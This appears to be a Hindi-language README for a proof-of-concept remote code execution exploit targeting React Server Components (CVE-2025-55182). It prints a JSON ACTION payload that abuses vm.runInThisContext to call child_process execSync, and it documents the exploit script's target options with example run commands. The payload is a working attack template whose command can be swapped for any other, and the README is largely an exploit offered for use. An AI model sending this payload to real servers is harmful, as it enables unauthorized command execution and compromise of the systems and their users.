
यह प्रोजेक्ट CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept है, जो दर्शाता है कि विशिष्ट परिस्थितियों में vm.runInThisContext और दुर्भावनापूर्ण ACTION payload के माध्यम से रिमोट कोड एक्ज़ीक्यूशन (RCE) ट्रिगर किया जा सकता है।
React Server Components का ACTION payload कुछ शर्तों के तहत:
हमलावर निम्नलिखित payload बना सकता है:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| पैरामीटर | अनिवार्य | डिफ़ॉल्ट मान | विवरण |
|---|---|---|---|
--host | हाँ | कोई नहीं | लक्ष्य सर्वर का IP या डोमेन नाम। उदाहरण के लिए: 127.0.0.1, 192.168.1.10, example.com |
--port | नहीं | 80 | लक्ष्य HTTP सेवा पोर्ट, उदाहरण के लिए: 3003 |
--path | हाँ | कोई नहीं | लक्ष्य का वह रूट पथ जो भेद्यता को ट्रिगर कर सकता है, उदाहरण के लिए: /feedback, /action |
--https | नहीं | False | क्या payload HTTPS से भेजना है (डिफ़ॉल्ट HTTP) |
python a.py --host <目标IP> --port <端口> --path <目标URL路径>
python a.py --host 127.0.0.1 --port 3003 --path /feedback